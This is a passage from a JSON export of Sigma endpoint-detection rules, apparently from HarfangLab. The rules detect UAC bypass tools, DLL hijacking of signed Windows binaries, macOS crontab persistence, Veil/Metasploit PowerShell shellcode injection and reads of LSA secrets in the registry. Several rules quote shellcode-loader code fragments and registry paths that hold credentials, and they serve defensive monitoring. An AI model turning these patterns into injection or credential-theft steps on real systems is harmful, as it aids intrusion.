condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f6fce5da-b097-4cf5-8047-19389b3d1f01",
"rule_name": "Winpwnage Elevation Tool Detected",
"rule_description": "Detects a suspicious command-line related to the usage of the Winpwnage elevation tool.\nWinPwnage is a post-exploitation tool used for privilege escalation, bypassing User Account Control (UAC), and executing unauthorized actions on Windows systems by leveraging known vulnerabilities and misconfigurations.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094489Z",
"creation_date": "2026-03-23T11:45:34.094491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_raserver.yml",
"content": "title: DLL Hijacking via raserver.exe\nid: f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6\ndescription: |\n Detects potential Windows DLL Hijacking via raserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'raserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6",
"rule_name": "DLL Hijacking via raserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via raserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f78214a0-fe9f-4af4-92f4-2ec1a00aa950",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625899Z",
"creation_date": "2026-03-23T11:45:34.625901Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_suspicious_execution_macos.yml",
"content": "title: Suspicious Crontab Execution (macOS)\nid: f78214a0-fe9f-4af4-92f4-2ec1a00aa950\ndescription: |\n Detects the execution of the crontab command from outside a shell.\n An attacker could use crontab to add a malicious cron jobs for persistence.\n It is recommended to investigate the parent process of crontab as well as the potential creation of jobs to determine whether this action was legitimate.\nreferences:\n - https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/24\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n\n exclusion_crontab_exec_shell:\n ParentImage:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n\n exclusion_installsandbox:\n GrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/*/postinstall'\n\n exclusion_mcafee:\n GrandparentCommandLine:\n - 'sh /usr/local/McAfee/AntiMalware/AntiMalwareMertool /var/folders/*/MerToolLogs/McAfeeMERTool-Anti-malware'\n - '/bin/bash /usr/local/McAfee/MSCMertool -s /var/folders/*/MerToolLogs/McAfeeMERTool'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f78214a0-fe9f-4af4-92f4-2ec1a00aa950",
"rule_name": "Suspicious Crontab Execution (macOS)",
"rule_description": "Detects the execution of the crontab command from outside a shell.\nAn attacker could use crontab to add a malicious cron jobs for persistence.\nIt is recommended to investigate the parent process of crontab as well as the potential creation of jobs to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-24",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f792ad64-30bf-49b1-9878-bd8adfee568c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091474Z",
"creation_date": "2026-03-23T11:45:34.091476Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recover.yml",
"content": "title: DLL Hijacking via recover.exe\nid: f792ad64-30bf-49b1-9878-bd8adfee568c\ndescription: |\n Detects potential Windows DLL Hijacking via recover.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'recover.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f792ad64-30bf-49b1-9878-bd8adfee568c",
"rule_name": "DLL Hijacking via recover.exe",
"rule_description": "Detects potential Windows DLL Hijacking via recover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7936a91-3d4d-4606-92d9-32e1c5794d98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084994Z",
"creation_date": "2026-03-23T11:45:34.084996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Veil-Framework/Veil",
"https://www.tevora.com/threat-blog/dissecting-veil-evasion-powershell-payloads-and-converting-to-a-bind-shell/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_veil_framework.yml",
"content": "title: PowerShell Veil Metasploit Payload Detected\nid: f7936a91-3d4d-4606-92d9-32e1c5794d98\ndescription: |\n Detects the usage of the Veil tool.\n Veil is a tool designed to generate Metasploit payloads that can bypass common anti-virus solutions.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy. The PowerShell telemetry can also be used to analyze the PowerShell content.\nreferences:\n - https://github.com/Veil-Framework/Veil\n - https://www.tevora.com/threat-blog/dissecting-veil-evasion-powershell-payloads-and-converting-to-a-bind-shell/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/05/06\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Veil\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # meterpreter\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_http.py\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_https.py\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_tcp.py\n selection_meterpreter:\n PowershellCommand|contains|all:\n - 'public static extern IntPtr VirtualAlloc('\n - 'public static extern IntPtr CreateThread('\n - '::VirtualAlloc(0,'\n - ',0x3000,0x40)'\n - '[System.Runtime.InteropServices.Marshal]::Copy('\n - '-namespace Win32Functions -passthru'\n - 'Start-Sleep -Second'\n\n # inline shellcode injection\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/shellcode_inject/virtual.py\n selection_inject_method_virtual:\n PowershellCommand|contains|all:\n - 'public static extern IntPtr VirtualAlloc('\n - 'public static extern IntPtr CreateThread('\n - 'public static extern IntPtr memset('\n - 'public static extern bool VirtualProtect('\n - '-namespace Win32Functions -passthru'\n - '::VirtualProtect('\n - '[UInt32]0x1000, [UInt32]0x20,'\n - '::CreateThread(0,0,'\n - 'Start-Sleep -Second'\n selection_inject_method_heap:\n PowershellCommand|contains|all:\n - 'public static extern IntPtr HeapCreate('\n - 'public static extern IntPtr HeapAlloc('\n - 'public static extern IntPtr CreateThread('\n - 'public static extern IntPtr memset('\n - '-namespace Win32Functions -passthru'\n - '::HeapCreate(0x00040000,'\n - '::HeapAlloc('\n - ',0x00000008,'\n - '::memset([IntPtr]('\n - '::CreateThread(0,0,'\n - 'Start-Sleep -Second'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7936a91-3d4d-4606-92d9-32e1c5794d98",
"rule_name": "PowerShell Veil Metasploit Payload Detected",
"rule_description": "Detects the usage of the Veil tool.\nVeil is a tool designed to generate Metasploit payloads that can bypass common anti-virus solutions.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy. The PowerShell telemetry can also be used to analyze the PowerShell content.\n",
"rule_creation_date": "2022-05-06",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7b8ea5f-a36a-4bd3-8e58-764553af77cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081247Z",
"creation_date": "2026-03-23T11:45:34.081249Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/wastedlocker-technical-analysis/97944/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_proximityuxhost.yml",
"content": "title: DLL Hijacking via ProximityUxHost.exe\nid: f7b8ea5f-a36a-4bd3-8e58-764553af77cc\ndescription: |\n Detects potential Windows DLL Hijacking via ProximityUxHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/wastedlocker-technical-analysis/97944/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ProximityUxHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\dui70.dll'\n - '\\dwmapi.dll'\n - '\\opcservices.dll'\n - '\\propsys.dll'\n - '\\proximitycommon.dll'\n - '\\proximityservicepal.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7b8ea5f-a36a-4bd3-8e58-764553af77cc",
"rule_name": "DLL Hijacking via ProximityUxHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ProximityUxHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7eb64b2-21b0-493f-8043-540bcb5ff18c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074885Z",
"creation_date": "2026-03-23T11:45:34.074887Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074892Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://www.nirsoft.net/utils/lsa_secrets_dump.html",
"https://github.com/laxa/SharpSecretsdump/",
"https://attack.mitre.org/software/S0008/",
"https://attack.mitre.org/techniques/T1003"
],
"name": "t1003_004_lsa_secrets_read.yml",
"content": "title: LSA Secrets Read from Registry\nid: f7eb64b2-21b0-493f-8043-540bcb5ff18c\ndescription: |\n Detects sensitive values in relation to the Local Security Authority (LSA) being read.\n The LSA is a component of Microsoft Windows responsible for enforcing security policies, handling authentications, and managing process privileges.\n Due to its functions, the LSA contains a variety of different credential materials, making it a common target for attackers looking to lateralize or escalate their privileges.\n Since some LSA secrets are stored in the Windows registry, many security tools such as the Impacket suite, gsecdump or SharpSecretsdump implement components reading these values either locally or through Remote Registry Services to extract valuable information.\n This rule monitors the values associated with the current and backup secrets, such as the NL$KM key, used to encrypt cached credentials.\n It is recommended to determine if the process accessing these values has a legitimate reason to do so.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\n - https://www.nirsoft.net/utils/lsa_secrets_dump.html\n - https://github.com/laxa/SharpSecretsdump/\n - https://attack.mitre.org/software/S0008/\n - https://attack.mitre.org/techniques/T1003\ndate: 2024/06/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.004\n - attack.t1003.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: ReadValue\n TargetObject|contains:\n - 'SECURITY\\Policy\\Secrets\\\\*\\CurrVal' # NLKM Key\n - 'SECURITY\\Policy\\Secrets\\\\*\\OldVal' # Backup\n - 'SECURITY\\Policy\\PolEKList' # List of encrypted keys used by LSA\n Image|contains: '?'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessCommandLine|contains:\n - ':\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe ExecutionPolicy Bypass -NoProfile -NonInteractive -Command'\n - ':\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7eb64b2-21b0-493f-8043-540bcb5ff18c",
"rule_name": "LSA Secrets Read from Registry",
"rule_description": "Detects sensitive values in relation to the Local Security Authority (LSA) being read.\nThe LSA is a component of Microsoft Windows responsible for enforcing security policies, handling authentications, and managing process privileges.\nDue to its functions, the LSA contains a variety of different credential materials, making it a common target for attackers looking to lateralize or escalate their privileges.\nSince some LSA secrets are stored in the Windows registry, many security tools such as the Impacket suite, gsecdump or SharpSecretsdump implement components reading these values either locally or through Remote Registry Services to extract valuable information.\nThis rule monitors the values associated with the current and backup secrets, such as the NL$KM key, used to encrypt cached credentials.\nIt is recommended to determine if the process accessing these values has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-04",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.004",
"attack.t1003.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f86d2a63-b9d6-453e-a211-26ff34ee6cce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296673Z",
"creation_date": "2026-03-23T11:45:35.296675Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296680Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Cscript/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md#atomic-test-2---ostap-payload-download",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_script_execution_engine_parameter.yml",
"content": "title: Suspicious Script Execution with Specified Engine Parameter\nid: f86d2a63-b9d6-453e-a211-26ff34ee6cce\ndescription: |\n Detects the suspicious execution of a Windows script engine with a parameter specifying the language to use.\n This technique has been used by attackers to execute files with misleading extensions. For instance, it was used by the OSTAP JScript downloader to execute malicious code from Office macro.\n It is recommended to investigate the parent process performing this action, the action performed by the child process and to analyze the script file itself to look for malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Cscript/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md#atomic-test-2---ostap-payload-download\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/12/05\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.WScript\n - classification.Windows.LOLBin.CScript\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n OriginalFileName|endswith:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '/e:'\n - '-e:'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n filter_cmd:\n ParentCommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\'\n - '?:\\WINDOWS\\SysWOW64\\cmd.exe /c ?:\\'\n\n selection_cmd:\n ParentCommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - 